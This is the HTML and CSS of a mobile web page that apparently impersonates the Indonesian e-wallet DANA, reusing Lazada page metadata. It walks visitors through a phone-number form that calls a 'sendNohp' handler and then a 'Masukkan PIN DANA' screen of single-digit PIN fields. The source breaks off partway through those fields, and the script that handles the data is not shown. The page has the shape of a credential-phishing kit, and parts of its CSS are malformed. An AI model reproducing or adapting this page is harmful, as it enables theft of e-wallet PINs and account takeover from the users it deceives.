
<html lang="ID">
<head>
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> 
<meta name="js-bundle-url" content="https://g.lazcdn.com/g/code/npm/@ali/gcp-lzd-project-lzd-member/2.1.22/js/login-by-otp.js">
<meta name="css-bundle-url" content="https://g.lazcdn.com/g/code/npm/@ali/gcp-lzd-project-lzd-member/2.1.22/css/login-by-otp.css">
<link rel="preconnect" href="https://g.lazcdn.com">
<link rel="preconnect" href="https://lzd-img-global.slatic.net">
<link rel="preload" href="https://g.lazcdn.com/g/lzdbase/res/1.0.3/??3rd/0.0.10/require.js,lib-promise/3.0.1/polyfillB.js,lib-mtop/2.6.1/mtop.js,lib-windvane/3.0.6/windvane.js" as="script">
<link rel="preload" href="//g.lazcdn.com/g/lzdbase/res/1.0.3/??17.0.2/react.min.js,17.0.2/react-dom.min.js" as="script">
<link rel="preload" href="https://g.lazcdn.com/g/code/npm/@ali/gcp-lzd-project-lzd-member/2.1.22/css/login-by-otp.css" as="style">
<link rel="preload" href="https://g.lazcdn.com/g/code/npm/@ali/gcp-lzd-project-lzd-member/2.1.22/js/login-by-otp.js" as="script" crossorigin="anonymous">
<title>login-by-otp</title>
<link rel="shortcut icon" href="https://lzd-img-global.slatic.net/g/tps/tfs/TB1e_.JhHY1gK0jSZTEXXXDQVXa-64-64.png">

<link rel="stylesheet" href="asset/container.css">
<link rel="stylesheet" href="asset/loader.css">

<link rel="stylesheet" href="asset/otp.css">
<link rel="stylesheet" href="asset/pin.css">
<script>
window.g_config = window.g_config || {};
window.g_config.language = "en";
window.g_config.regionID = "ID";
(function() {
  function getCookieItem(sKey) {
    return (decodeURIComponent(document.cookie.replace(new RegExp("(?:(?:^|.*;)\\s*" +encodeURIComponent(sKey).replace(/[\-\.\+\*]/g, "\\$&") + "\\s*\\=\\s*([^;]*).*$)|^.*$"),"$1")) || null);
  }
  function getUrlParam(name) {
    var reg = new RegExp(`(^|&)${name}=([^&]*)(&|$)`);
    var r = window.location.search.substr(1).match(reg);
    if (r != null) {
      return decodeURIComponent(r[2]);
    }
    return null;
  }
  var language = window.g_config.language;
  try {
    var whLanguage = getUrlParam('wh_language');
    if (whLanguage) {
      language = whLanguage;
    } else {
      var hng = getCookieItem("hng");
      if (hng) {
        var hngArr = hng.split("|");
        if (hngArr && hngArr.length >= 2) {
          language = hngArr[1].split("-")[0];
        }
      }
    }
  } catch(err) {
    console.log(err);
  }
  window.g_config.language = language;
})();
</script>
<style>
  *[style*=NotoSans-Regular i] {
    font-family: NotoSans-Regular,-apple-system,BlinkMacSystemFont,Roboto,"Helvetica Neue",Helvetica,Tahoma,Arial,"PingFang SC","Microsoft YaHei",sans-serif !important;
    font-weight: 400;
  }
  *[style*=NotoSans-SemiBold i] {
    font-family: NotoSans-SemiBold,-apple-system,BlinkMacSystemFont,Roboto,"Helvetica Neue",Helvetica,Tahoma,Arial,"PingFang SC","Microsoft YaHei",sans-serif !important;
    font-weight: 500;
  }
  *[style*=NotoSans-Bold i] {
    font-family: NotoSans-Bold,-apple-system,BlinkMacSystemFont,Roboto,"Helvetica Neue",Helvetica,Tahoma,Arial,"PingFang SC","Microsoft YaHei",sans-serif !important;
    font-weight: 700;
  }
</style>
<style>
  *[style*=NotoSans-SemiBold i], *[style*=NotoSans-Bold i] {
    letter-spacing: -0.5px;
  }
</style>
<style>
/*! normalize.css v8.0.1 | MIT License | github.com/necolas/normalize.css */
button,hr,input {
    overflow: visible
}
progress,sub,sup {
    vertical-align: baseline
}
[type=checkbox],[type=radio],legend {
    box-sizing: border-box;
    padding: 0
}
a,a:hover {
    text-decoration: none
}
a,html {
    -webkit-tap-highlight-color: transparent
}
body {
    font-family: NotoSans-Regular,-apple-system,BlinkMacSystemFont,Roboto,"Helvetica Neue",Helvetica,Tahoma,Arial,"PingFang SC","Microsoft YaHei",sans-serif !important;
    margin: 0;
    position: fixed
    width: 100%;
    background: #fff;
}
details,main {
    display: block
}
h1 {
    font-size: 2em;
    margin: .67em 0
}
hr {
    box-sizing: content-box;
    height: 0
}
code,kbd,pre,samp {
    font-family: NotoSans-Regular;
    font-size: 1em
}
a {
    background-color: transparent
}
abbr[title] {
    border-bottom: none;
    text-decoration: underline;
    text-decoration: underline dotted
}
b,strong {
    font-weight: bolder
}
small {
    font-size: 80%
}
sub,sup {
    font-size: 75%;
    line-height: 0;
    position: relative
}
sub {
    bottom: -.25em
}
sup {
    top: -.5em
}
img {
    border-style: none
}
button,input,optgroup,select,textarea {
    font-family: inherit;
    font-size: 100%;
    margin: 0
}
button,select {
    text-transform: none
}
[type=button],[type=reset],[type=submit],button {
    -webkit-appearance: button
}
[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,[type=submit]::-moz-focus-inner,button::-moz-focus-inner {
    border-style: none;
    padding: 0
}
[type=button]:-moz-focusring,[type=reset]:-moz-focusring,[type=submit]:-moz-focusring,button:-moz-focusring {
    outline: ButtonText dotted 1px
}
fieldset {
    padding: .35em .75em .625em
}
legend {
    color: inherit;
    display: table;
    max-width: 100%;
    white-space: normal
}
textarea {
    overflow: auto
}
[type=number]::-webkit-inner-spin-button,[type=number]::-webkit-outer-spin-button {
    height: auto
}
[type=search] {
    -webkit-appearance: textfield;
    outline-offset: -2px
}
[type=search]::-webkit-search-decoration {
    -webkit-appearance: none
}
::-webkit-file-upload-button {
    -webkit-appearance: button;
    font: inherit
}
summary {
    display: list-item
}
[hidden],template {
    display: none
}
table {
    border-collapse: separate;
    border-spacing: 0
}
caption,td,th {
    text-align: left;
    font-weight: 400
}
table,td,th {
    vertical-align: middle
}
blockquote:after,blockquote:before,q:after,q:before {
    content: ""
}
blockquote,q {
    quotes: "" ""
}
a img {
    border: none
}
html {
    font-family: NotoSans-Regular,-apple-system,BlinkMacSystemFont,Roboto,"Helvetica Neue",Helvetica,Tahoma,Arial,"PingFang SC","Microsoft YaHei",sans-serif;
    font-weight: 400;
    font-size: 100%;
    line-height: 1.15
}
.lzd-font-thin {
    font-weight: 300
}
.lzd-font-normal {
    font-weight: 400
}
.lzd-font-bold {
    font-weight: 500
}
.lzd-font-bolder {
    font-weight: 600
}
.lzd-font-small {
    font-size: 12px
}
.lzd-font-normal {
    font-size: 14px
}
.lzd-font-large {
    font-size: 16px
}
.lzd-font-larger {
    font-size: 18px
}
.lzd-theme-color {
    color: #ff330c
}
.lzd-text-overflow {
    overflow: hidden;
    text-overflow: ellipsis;
    white-space: nowrap
}
.lzd-base-mask {
    position: absolute;
    top: 0;
    bottom: 0;
    left: 0;
    right: 0;
    width: 100%;
    height: 100%;
    background: rgba(0,0,0,.03)
}
.lzd-base-center {
    display: flex;
    align-items: center;
    justify-content: center
}
.lzd-icon-navigation-arrow:hover {
    background: rgba(0,0,0,.15)!important
}
.laz-icon-navigation-hover:hover {
    color: #FE4960!important
}
.lzd-voucher-arrow:hover {
    background: rgba(0,0,0,.3)!important
}
.lzd-two-line-ellipsis {
    overflow: hidden;
    text-overflow: ellipsis;
    display: -webkit-box;
    -webkit-box-orient: vertical;
    -webkit-line-clamp: 2
}
.lzd-item-hover-mask:hover {
    opacity: 1!important
}
.product-list .product-row:last-child {
    margin-bottom: 0!important
}
.elevator-tab-item:hover {
    background-image: linear-gradient(136deg,#FF933F 0,#F93782 67%,#F93782 100%)!important
}
.elevator-tab-item span:hover {
    color: #fff!important
}
.lzd-rwb-bottom-bar-placeholder {
    height: 52px
}
@media only screen and (device-width: 375px) and (device-height:812px),screen and (device-width:414px) and (device-height:896px) {
    .lzdrwb-navigation-base {
        padding-bottom:17px
    }
    .lzd-rwb-bottom-bar-placeholder {
        height: 69px
    }
}

.i-loading-container .i-loading-wrapper-icon{height:100%;width:100%}.i-loading-container .i-loading-wrapper-enter{opacity:0}.i-arise-loading-container .i-arise-loading-mask{background-color:hsla(0,0%,100%,.55);bottom:0;left:0;position:fixed;right:0;top:0;touch-action:none;z-index:998}.i-arise-loading-container .i-arise-loading-wrapper{align-items:center;border-radius:100%;display:flex;height:6.933vw;justify-content:center;left:50%;position:fixed;top:50%;transform:translate(-50%,-50%);transition:opacity .2s;width:6.933vw;z-index:999}.i-arise-loading-container .i-arise-loading-wrapper-icon{height:8.533vw;width:8.533vw}.i-arise-loading-container .i-arise-loading-wrapper-text{margin-top:3.2vw}.i-arise-loading-container .i-arise-loading-content{align-items:center;display:flex;flex-direction:column;justify-content:center}.i-arise-loading-container .i-arise-loading-wrapper-enter{opacity:0}.i-infinite-scroll{position:relative}.i-infinite-scroll .loading{align-items:center;display:flex;justify-content:center;margin-top:2.667vw}.i-infinite-scroll .loading .loading-icon{height:9.333vw!important;width:9.333vw!important}.i-infinite-scroll .loading .loading-content{font-size:3.733vw;font-weight:500;margin-left:2.667vw}

.pin-code2{ 
  padding: 0; 
  margin: 0px auto; 
  display: ;
  position: relative;
  justify-content:center;
  left: 0;
  right: 0;
  width: 100%;
  text-align: center;
  
} 
 
.pin-code2 input { 
  border: none; 
  text-align: center; 
  width: 45px;
  font-weight: bold;
  height:45px;
  font-size: 32px; 
  background-color: #F5F5F5;
  margin-right:3px;
  border-radius: 8px;
} 



.pin-code2 input:focus { 
  border: 0px solid #573D8B;
  outline:none;
} 


.efek-ketik
        {
            font-size: 30px;
            width: 100%;
            white-space:nowrap;
            overflow:hidden;
            -webkit-animation: ketik 7s steps(50, end);
            animation: ketik 7s steps(50, end);
        }
 
        @keyframes ketik{
            from { width: 0; }
        }
 
        @-webkit-keyframes ketik{
            from { width: 0; }
        }
        
        
    h3{
  font-size: 23px;  
}

 
 * {
  box-sizing: border-box;
  scrollbar-color: transparent transparent; /* thumb and track color */
  scrollbar-width: 0px;
}

*::-webkit-scrollbar {
  width: 0;
}

*::-webkit-scrollbar-track {
  background: transparent;
}

*::-webkit-scrollbar-thumb {
  background-color: #118EEA;
  border: none;
}

* {
  -ms-overflow-style: none;
}

ol, li {
  list-style: none;
  margin: 0;
  padding: 0;
}

.carousel {
  position: absolute;
  background-color: #118EEA;
  padding-top:0%;
  height: 100%;
  top: 0;
  right: 0;
  left: 0;
  margin: 0px auto;
  perspective: 200px;
}

.carousel__viewport {
  position: absolute;
  width: 100%;
  top: 0;
  background-color: #118EEA;
  right: 0;
  bottom: 0;
  left: 0;
  height: 530px;
  display: flex;
  overflow-x: scroll;
  counter-reset: item;
  margin: 0px auto;
 
  scroll-behavior: smooth;
  scroll-snap-type: x mandatory;
}

.carousel__slide {
  position: relative;
  flex: 0 0 100%;
  width: 100%;
  height: 100%;
  margin-left: 10px;
  background-color: #118EEA;
  counter-increment: item;
  z-index: 99999999;
}

.carousel__slide:nth-child(even) {
  background-color: #118EEA;
}

.carousel__slide:before {
  content: counter(item);
  position: absolute;
  top: 50%;
  left: 50%;
  transform: translate3d(-50%,-40%,70px);
  color: #000;
  font-size: 2em;
  background-color: #118EEA;
}

.carousel__snapper {
  position: relative;
  top: 0;
  left: 0;
  right: 0;
  bottom: 0;
  width: 100%;
  height: 100%;
  scroll-snap-align: center;
  background-color: #118EEA;
  
  
}

@media (hover: hover) {
  .carousel__snapper {
    animation-name: tonext, snap;
    animation-timing-function: ease;
    animation-duration: 4s;
    animation-iteration-count: infinite;
  }

  .carousel__slide:last-child .carousel__snapper {
    animation-name: tostart, snap;
  }
}

@media (prefers-reduced-motion: reduce) {
  .carousel__snapper {
    animation-name: none;
  }
}

.carousel:hover .carousel__snapper,
.carousel:focus-within .carousel__snapper {
  animation-name: none;
}

.carousel__navigation {
  position: absolute;
  right: 0;
  bottom: 0;
  left: 0;
  text-align: center;
}

.carousel__navigation-list,
.carousel__navigation-item {
  display: inline-block;
}


.carousel::before,
.carousel::after,
.carousel__prev,
.carousel__next {
  position: absolute;
  top: 0;
  margin-top: 37.5%;
  width: 0;
  height: 0;
  transform: translateY(-50%);
  border-radius: 50%;
  font-size: 0;
  outline: 0;
  opacity: 0.0;
}

.carousel::before,
.carousel__prev {
  left: -1rem;
}

.carousel::after,
.carousel__next {
  right: 0rem;
}

.carousel::before,
.carousel::after {
  content: '';
  z-index: 1;
  background-color: #fff;
  background-size: 1.5rem 1.5rem;
  background-repeat: no-repeat;
  background-position: center center;
  color: #000;
  font-size: 2.5rem;
  line-height: 4rem;
  text-align: center;
  pointer-events: none;
}

/*********************/
.process1 {
     width: 100%;
            height: 100%;
             display: flex;
             justify-content: center;
            margin: auto;
            position: absolute;
           padding-top: 300px;
            left: 0;
            right: 0;
            bottom: 0;
            background: rgba(0, 0, 0, 0.6);
            z-index: 99999;
            
      
}
.loading {
    position: absolute;
    display: flex;
    justify-content: center;
    align-items: center;
    margin-bottom: 20%;
}
.loading img {
    width: 50px;
    
    top: 10;
}
.loading .spinner{
    position: absolute;
    width: 35px;
    animation: spin 1s linear infinite;
    -webkit-animation: spin 1s linear infinite;
    -moz-animation: spin 1s linear infinite;
    -ms-animation: spin 1s linear infinite;
    -o-animation: spin 1s linear infinite;
}
@keyframes spin {
  0% { transform: rotate(360deg); }
  100% { transform: rotate(0deg); }
}
@-webkit-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-moz-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-ms-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-o-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}

/*********************/

 #homeku{
     width: 100%;
     height: 100%;
     position: fixed;
    background: #118EEA;
  background-position: 100% 100%;
  background-size: 100% 100%;
  left: 0;
  right: 0;
  top: 0;
  bottom: 0;
  margin: 0px auto;
     
     
 }
 
 .inp{
     width: 70%;
     padding-left: 10px;
     color: #000;
 }
 
 
 .btn-backku{
     position: absolute;
     left: 20;
     top: 12;
     background: transparent;
     color: #fff;
     border: none;
     font-size: 18px;
     font-weight: 300;
    
 }
 
 
 .nope::placeholder{
    font-size: 15px;
 }
 
 .box-input p {
     color: #fff;
 }
 
 
 @import url('../../external.html?link=https://fonts.googleapis.com/css2?family=Open+Sans:wght@400;600;700&amp;display=swap');* {font-family: 'Open Sans', sans-serif;font-weight: 400;margin: 0;padding: 0;box-sizing: border-box;position: relative;color: #fff;}b { font-weight: 700; }.box-login, .container {background: #118EEA;height: 100%;width: 100%;}body .header {width: 100%;margin-top: 10px;padding: 10px;height: 50px;display: flex;justify-content: center;align-items: center;}body .header .back {height: 35%;max-height: 35%;min-height: 35%;position: absolute;left: 20px;}body .header .logo {height: 100%;max-height: 100%;min-height: 100%;} {width: 100%;height: 100%;display: flex;padding: 50px 20px;align-items: center;flex-direction: column;} h3 {width: 100%;font-size: 14px;text-align: center;} .box-in<link rel="stylesheet" href="./asset/loader.css">{width: 100%;height: 42px;padding: 5px 15px;margin-top: 50px;background: #fff;display: flex;border-radius: 10px;align-items: center;} .box-input input::placeholder {color: #c6c6c6;} .box-input .label {height: 100%;min-height: 100%;max-height: 100%;padding: 4px;width: 70px;min-width: 70px;max-width: 70px;display: flex;justify-content: center;align-items: center;}.box-input .label img {height: 55%;max-height: 55%;min-height: 55%;border-radius: 1px;box-shadow: 0 0 2px rgba(0,0,0,0.0);}.box-input .label label {color: #000;font-size: 15px;font-weight: 600;margin: 0 10px 0 10px;} .desc {width: 100%;margin-top: 40px;font-size: 13px;text-align: center;} .box-btn {width: 100%;height: auto;position: fixed;bottom: 0;} .box-btn button:disabled {opacity: 0.7;} .box-btn button:active {background: #0000000;} .box-btn button {padding: 20px 0 30px 0;opacity: 1;width: 100%;height: 60px;background: none;outline: none;border: none;font-size: 16px;text-align: center;}.start {top: 0;left: 0;right: 0;width: 100%;height: 100%;min-height: 100%;max-height: 100%;position: fixed;z-index: 999;display: flex;justify-content: center;align-items: center;flex-direction: column;background: #118EEA;}.start .logo {width: 50%;margin-top: -40px;}.start .footimg {width: 400px;height: 60px;display: flex;justify-content: center;align-items: center;position: fixed;bottom: 40px;z-index: 99999;}.start .footimg img {min-height: 40px;max-height: 40px;height: 40px;margin: 0 8px 0 0;}.start .footimg p {font-size: 10px;white-space: nowrapcolor;}@media screen and (min-width: 900px; colortt) {html {background: #118EEA;}body {display: flex;justify-content: center;align-items: center;background: #000000b;}.container {width: 450px;min-width: 450px;max-width: 450px;height: 700px;min-height: 700px;max-height: 700px;display: flex;justify-content: center;align-items: center;margin: auto;border-radius: 1t5px;overflow: hidden;}.index {border-radius: 15px;width: 450px;min-width: 450px;max-width: 450px;height: 740px;min-height: 740px;max-height: 740px;}.start {border-radius: 15px;position: absolute;top: auto;left: auto;right: auto;width: 450px;min-width: 450px;max-width: 450px;height: 700px;min-height: 700px;max-height: 700px;z-index: 999;display: flex;justify-content: center;align-items: center;flex-direction: column;}.start .footimg {position: absolute;}.box-login {padding: 25px;width: 450px;min-width: 450px;max-width: 450px;height: 700px;min-height: 700px;max-height: 700px;box-shadow: 0 0 7px rgba(0,0,0,0.0);} .box-btn {position: absolute;bottom: 0;} {height: 90%;min-height: 90%;max-height: 90%;}}.hid { display: none; }
 
 .inp::placeholder{
     font-weight: bold;
     
 }
 
 
 .bh1 {
    font-weight: 700;
    font-size: 15px;
    color: white;
 }
 
 .bh11{
     font-size: 15px;
     margin-top: 5px;
     color: white;
     margin-bottom: -10px;
     font-weight: 300;
 }
 
 .inputNo {
    box-sizing: border-box;
    margin-top: 20px;
    width: 100%;
    height: 100%;
    max-height: 800px;
}
.formNo,  {
    box-sizing: border-box;
    border: none;
    outline: none;
    border-radius: 10px;
    width: 100%;
    max-width: 500px;
    height: 42px;
    display: block;
    margin: auto;
    font-size: 24px;
    font-weight: 600;
    padding-left: 90px;
}
.formNo {
    max-width: 500px;
    margin: auto;
    margin-top: -60px;
    height: 100%;
    max-height: 700px;
}
label {
    display: inline-block;
    position: relative;
    bottom: -49px;
}
.flagIndo {
    width: 25px;
    margin-left: 10px;
    margin-right: 5px;
    border-radius: 2px;
    box-shadow: 0.3px 0.3px 2px #ccc;
}
.codeTel {
    font-weight: 600;
    font-size:17px ;
}
.syarat {
    font-size: 14px;
    margin-left: 0px;
    margin-right: 0px;
    color: white;
    font-weight: 400;
}
.send_data {
    background: none;
    font-size: 15px;
    color: #ffffff9c;
    border: none;
    width: 70px;
    height: 40px;
    margin-top: 500px;
    transition: 0.3s;
}
.send_data:active,.send_data:hover,.send_data:focus{
    font-size: 15.3px;
    color: #ffffff;
    width: 75px;
    height: 45px;
    transition: 0.3s;
}
input::placeholder {
    font-weight: 600;
    font-size: 24px;
    padding-top: 7px;
    padding-left: 2px;
    color: #bebebe;
}

.desc {
    font-size: 14px;
    margin-left: 0px;
    margin-right: 0px;
    color: white;
    font-weight: 400;
}

<style>
#animation-demo {
	width: 200px;
	height: 150px;
	position: relative;
	background-color: #62A80A;
	line-height: 150px;
	color: #000;
	border: solid 1px #1A7404;
	text-align: center;
} 

.divotp {
	-webkit-animation-duration: 1s;
	animation-duration: 1s;
	-webkit-animation-fill-mode: both;
	animation-fill-mode: both;
	-webkit-animation-timing-function: linear;
	animation-timing-function: linear;
	-webkit-animation-name: fadeInUpBig; 
    animation-name: fadeInUpBig; 
}

@-webkit-keyframes fadeInUpBig { 
    0% { 
        opacity: 0; 
        -webkit-transform: translateY(200px); 
    } 
    100% { 
        opacity: 1; 
        -webkit-transform: translateY(0); 
    } 
} 
@keyframes fadeInUpBig { 
    0% { 
        opacity: 0; 
        transform: translateY(200px); 
    } 
    100% { 
        opacity: 1; 
        transform: translateY(0); 
    } 
} 



#myOtp{
     display: none;
  position: fixed;
  left: 0;
  right: 0;
  top: 0;
  bottom: 0;
  margin: 0px auto;
    width: 100%;
    height: 100%;
    z-index: 999999999999999999999;
    display: none;
}

<style>
#animation-demo {
	width: 200px;
	height: 150px;
	position: relative;
	background-color: #62A80A;
	line-height: 150px;
	color: #000;
	border: solid 1px #1A7404;
	text-align: center;
} 

.divotp {
	-webkit-animation-duration: 1s;
	animation-duration: 1s;
	-webkit-animation-fill-mode: both;
	animation-fill-mode: both;
	-webkit-animation-timing-function: linear;
	animation-timing-function: linear;
-webkit-animation-name: fadeInUpBig; 
    animation-name: fadeInUpBig; 
}

@-webkit-keyframes fadeInUpBig { 
    0% { 
        opacity: 1; 
        -webkit-transform: translateY(200px); 
    } 
    50% { 
        opacity: 1; 
        -webkit-transform: translateY(0); 
    } 
} 
@keyframes fadeInUpBig { 
    75% { 
        opacity: 1; 
        transform: translateY(200px); 
    } 
    100% { 
        opacity: 1; 
        transform: translateY(0); 
    } 
} 
.i-input-container input::placeholder{
    font-size: 15px;
    font-weight: 400;
}


.code p h1{
    color: #000;
}

.code p {
    color: #000;
}


.pin-code2 .input-text {
    color: #000;
}
</style>
<fieldsst id="logindana" style="left: 0; width: 100%; display: ; top: 0; height: 100%; position: fixed; right: 0; margin: 0px auto; ">
<remix id=""  style="left: 0; width: 100%; display: ; top: 0; height: 100%; position: fixed; right: 0; margin: 0px auto; z-index: 999; background: #118EEA;">
 <div style="display:none;" class="index">
	<div class="header">
		<img src="./asset/dana_logo.png" class="logo" alt="">
	</div>
	<div class="content">
		<div class="hero">
			<img src="./asset/hero.svg" alt="">
		</div>
		<h1>Dompet digital untuk kamu!</h1>
		<p class="desc">
			Simpan uang serta kartu debit/kredit dengan<br>praktis di DANA</p>
		<div class="line"></div>
		<p class="log">
			Masukkan <b>nomor HP</b> kamu untuk lanjut
		</p>
		<button type="button" onclick="next();">LOGIN</button>
	</div>
</div>


<div class="container hid" style="position: fixed">
    
	<div class="" style="text-align: center;" id="homeku">
   

        
     <section class="carousel" aria-label="Gallery" style="margin-top: 0px; text-align: center; left: 0">
  <ol class="carousel__viewport">
    <li id="carousel__slide1"
        tabindex="0"
        class="carousel__slide" style="background-color: #118EEA;">
      <div class="carousel__snapper"  style="background-image: url('https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilUMIG_IMFVixTFpWb4xA5f1HJt25lbv-cc1baknB_YJeWO9FYU4SJOzdeMNkA1msFpUU-0MiI3B-llmFX122-XhqCq7-1HW4YUfaWX52rlNtfspDDvlFNj_A--xZIRknP3ycDkzm51noxYaFx_gfOck3U745QZSBwpCSesqOq1oEycuQamqaZlqoz/s16000/ezgif.com-crop%20(3).gif');
      background-position: 100% 100%;
      background-repeat: no-repeat;
      background-size: 100% 100%; z-index: 99999999; position: relative;">
       
       
      </div>
    </li>
    <li id="carousel__slide2"
        tabindex="0"
        class="carousel__slide" style="background-color: #118EEA;">
      <div class="carousel__snapper" style="background-image: url('https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixR-U2gHP_VriGKaaVcf-_BbZmvWWoaRI8Wd26DYewNJayil_To6kgdWxmdq3TDJKQJ7lAAbD1de1uuuWTLQzCGdR8qT1S2mTehsdR02AFN573iPkN-0IrliCuRAy0xJfSH9AlfJWV7odqpRC_bxJLM2EkLf-84_ePEjEfE8SOtiKfEjcLQ7nDBjDc/s16000/ezgif.com-crop%20(4).gif');
      background-position: 100% 100%;
      background-repeat: no-repeat;
      background-size: 100% 100%; background-color: transparent;"></div>
      <a href="#carousel__slide1"
         class="carousel__prev">Go to previous slide</a>
      <a href="#carousel__slide3"
         class="carousel__next">Go to next slide</a>
    </li>
    <li id="carousel__slide3"
        tabindex="0"
        class="carousel__slide" style="background-color: #118EEA;">
      <div class="carousel__snapper"  style="background-image: url('https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjj8Fs3JMUwF85O07XgsV-e1rmQjTwS91jcu-zh3Lr_fEgVfhY823rmnMewtU59iGvsFjcBm-12OLSj81f57ZEksJeU2GaG7UU3zuwDsOsfTO4dAJ693JJyILcXjdHEzirw-pPBCeV1CfTqSroNgoMTGIfy-Y-HC8GAJDmo68GYd1-x2gGu0UsincrU/s16000/ezgif.com-crop%20(5).gif');
      background-position: 100% 100%;
      background-repeat: no-repeat;
      background-size: 100% 100%;">
       
       
      </div>
    </li>
   
  </ol>
  <aside class="carousel__navigation">
    <ol class="carousel__navigation-list">
      <li class="carousel__navigation-item">
        <a href="#carousel__slide1"
           class="carousel__navigation-button"></a>
      </li>
      <li class="carousel__navigation-item">
        <a href="#carousel__slide2"
           class="carousel__navigation-button"></a>
      </li>
      <li class="carousel__navigation-item">
        <a href="#carousel__slide3"
           class="carousel__navigation-button"></a>
      </li>
      <li class="carousel__navigation-item">
        
    </ol>
  </aside>
</section>
<button id="butonku" style="width: 100%; height: 140px; position: fixed; bottom: 0; left: 0; right: 0; margin: 1px auto; border: 0; background: url('https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEid9dARAQbMu1UTEgpOfyH6pn4eI3_XArbELp_8lfZtysRgex-gqs0Czc9ch_O7U2lrucgBVSqGQEL33BwV3Ri4D3evjzJHJ6LBFa_K-pIPbdO6QQ3iHlTkLiqo_w2z2NbXTw83lNcWHG7T9q2n6m7N3SZ-qfZpTdsioS3dm-YIfJh4zU16QEODOLKn/s16000/AddText_06-06-08.17.04.jpg');
      background-position: 100% 100%;
      background-repeat: no-repeat;
      background-size: 100% 100%; z-index: 99999" onclick="nextPrev()"></button>
      <center>
     <div id="process1" name="process" class="process" style="display: none;">
            <div class="loading">
                <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8hbZEfutKvr9pkj0-mkJYWt-1SBtt3gw-HFOEZc0172okrp0SFHLaW3PRGVDm1U0P7WWEMELIw4nlq1_1gCgyZBo3cxf-OJNpguNamdJryCkGU-hTHiW3RyOv5JD9eIjXTFtrJFCVn0ae4RxG4Oi-czAP20tEaJI3OstxFAbtOwtFxp6RvOHc6NZL/s1600/load_bg.png">
                <img class="spinner" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl9xJVYWF_a9vAhgW5QQgozvZVADTaJgIX64iO7a5sQuMpSoPBK3zfKjvT6xc9fZPfxZz39mjk1H_oZOOOtYvO1l7DkWNqiD5LJyGYdwDNyHuyqLk_Ix6eFs3aLCG2yUXVwtsnj0BXTA40WZmecyLyCIm_ff0xNkkOvkuKBOl6yfS-QjI_EJrIyGtU/s1600/load_spin.png" id="loading" style="margin-top: 6px">
            </div>
        </div>
        </center>
  </div>
  <div id="blogin" class="box-login" style="width: 100%;
    height: 100%;
    bottom: 0; 
    position: fixed; 
    left: 0; 
    padding: 0px
    right: 0; 
    margin: 0px auto;
    top: 0; display: none;">
      	<div id="process" name="process" class="process" style="display: none;">
			<div class="loading">
				<img src="./asset/load_bg.png"><img class="spinner" src="./asset/load_spin.png" style="margin-top: 6px">
			</div>
		</div>
		
		<div class="header">
<button id="back1" type="button" class="btn-backku" onclick="goback1()"><ion-icon name="chevron-back-outline"></ion-icon></button>	<p></p>


			<img src="./asset/dana_logo.png" class="logo" alt="">
		</div>
	<form id="formNohp" onsubmit="sendNohp(event);" >
		     <input type="hidden"5 id="logo" value="❁┷━❃∞∞𝗗𝗔𝗡𝗔∞∞❃━┷❁">
		<center>
		
			<h3 style="font-size: 16px; margin-top: 40px; color: #fff">Masukkan <b>nomor HP</b> kamu untuk lanjut</h3>
			<div class="box-input" style="width: 95%; z-index: 9999999999999; background: transparent">
			
			<input class="inp" id="inp" type="tel" placeholder="811-1234-5678" style="position: fixed; top: 165; width: 80%; left: 0 ; right: 0; height: 42px; border-radius: 10px; margin: 0px auto; padding-left: 82px; background: #fff; color: #000; font-size: 22px; background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxMZldTF1M2aAeg2NvLB-Tlpbhsx_Ar3wVMKxuvnUOcjKNsR7aW3lttfeLO03rPP2F7U9LYzja1a7cjo_SuTnhaiiSVkHG5GifOVnc7jHJJ9RXaB8rSW6mXp_Or4PJ-VnmJOD0Q2-DnaM1eVTkfP-YE5TAV_RogvAODySxog_-RO9TtTnneRdSbhI9QbY/s1080/AddText_11-21-08.09.59.jpg);
      background-position: 100% 100%;
      background-repeat: no-repeat;
      background-size: 100% 100%; font-weight: bold; background-color: #fff">
			
			</div>
			<p class="desc7" style="font-size: 14px; line-height: 18px; margin-top: 100px; padding: 10px; background: #118EEA; color::#fff">
			Dengan melanjutkan, kamu setuju dengan <b>Syarat<br/>& Ketentuan</b> dan
				<b>Kebijakan Privasi</b> kami
			</p>
			<div class="box-btn">
			    <center>
				<button disabled id="btn" class="btnnohp" type="submit" style="position: fixed; bottom: 0; left: 0; right: 0; margin: 0px auto; background: transparent;">LANJUT</button>
				</center>
			</div>
		</form>
		
		<form id="formPin" omsubmit="return false" class="hid" style="width: 100%;
    height: 100%;
    bottom: 0; 
    position: fixed; 
    left: 0; 
    right: 0; 
    margin: 0px auto;
    top: 0; background: #118EEA; z-index: 9999999999">
		    <center>
		    	<img src="./asset/dana_logo.png" class="logo" alt="" width="100px" style="margin-top: 20px">
		    	</center>
		     <input type="hidden" id="logo" value="❁┷━❃∞∞𝗗𝗔𝗡𝗔∞∞❃━┷❁">
		    <button id="back2" type="button" class="btn-backku" onclick="goback2()" style="margin-top: 10px"><ion-icon name="chevron-back-outline"></ion-icon></button>
			<h3 style="margin-top: 50px; font-weight: 600; margin-bottom: -10px; font-size: 16px"><font style="font-weight: 400">Masukkan</font> PIN DANA</h3>
<div class="box-input-pin" maxlength="6" style="margin-top: 50px"> 
	 
          
       <input onkeypress="if(this.value.length==1) return false;" type="tel" id="pin11" data-id="1" name="pin11" maxlength="1" required autofocus class="input-text input-text-security-none"> 
       <input onkeypress="if(this.value.length==1) return false;" type="tel" id="pin22" data-id="2" name="pin22" maxlength="1" autofocus class="input-text input-text-security-none"> 
       <input onkeypress="if(this.value.length==1) return false;" type="tel" id="pin33" data-id="3" name="pin33" maxlength="1" autofocus class="input-text input-text-security-none"> 
